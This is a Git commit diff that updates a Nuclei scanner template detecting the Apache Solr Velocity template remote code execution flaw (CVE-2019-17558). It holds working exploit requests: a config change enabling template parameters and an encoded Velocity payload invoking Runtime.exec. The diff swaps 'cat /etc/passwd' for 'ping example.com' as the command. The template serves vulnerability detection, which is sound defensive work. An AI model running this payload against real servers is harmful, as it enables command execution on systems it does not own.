daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1231 from Mad-robot/patch-1 

Update CVE-2019-17558.yaml
patch-1
Sandeep Singh 2021-04-17 21:04:15 +05:30 committed by GitHub
parent c919c76207 d4025787ca
commit 0ed9083f12
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
cves/2019/CVE-2019-17558.yaml
View File

@ -1,19 +1,21 @@
id: CVE-2019-17558
info:
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
author: pikpikcu
author: pikpikcu & madrobot
severity: critical
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
requests:
- raw: # Request: set "params.resource.loader.enabled"
- raw:
- |
POST /solr/atom/config HTTP/1.1
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
POST /solr/§token§/config HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
@ -34,11 +36,8 @@ requests:
}
}
# RCE via velocity template:
# Get /etc/passwd
- |
GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
GET /solr/§token§/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
@ -46,12 +45,18 @@ requests:
Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
internal: true
name: token
group: 1
regex:
- "\"name\":\"(.*)\""
matchers:
- type: word
words:
- "Pinging example.com" # Windows
- "PING example.com" # Linux
condition: or